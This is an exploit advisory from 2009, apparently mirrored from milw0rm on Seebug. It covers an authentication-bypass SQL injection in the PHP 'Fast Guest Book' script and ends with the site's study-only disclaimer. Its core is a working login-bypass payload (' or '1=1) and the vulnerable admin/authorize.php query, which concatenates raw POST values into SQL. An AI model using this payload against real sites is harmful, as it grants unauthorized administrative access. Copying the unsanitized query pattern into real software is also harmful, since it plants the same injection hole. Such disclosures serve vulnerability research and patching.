########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ============================================================================== Fast Guest Book (Auth Bypass) SQL Injection Vulnerability ============================================================================== [»] Script: [ Fast Guest Book ] [»] Language: [ PHP ] [»] Website: [ http://fastcreators.com/products/guestbook/download.php ] [»] Founder: [ Moudi <m0udi@9.cn> ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ] [»] Team: [ EvilWay ] ########################################################################### ===[ Exploit ]=== [»] ' or '1=1 ===[ BUG ]=== [»] Bug In \admin\authorize.php $query = "select * from admin where userid='{$_POST['uname']}' AND pass='{$_POST['pass']}'"; Author: Moudi ########################################################################### # milw0rm.com [2009-01-11]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论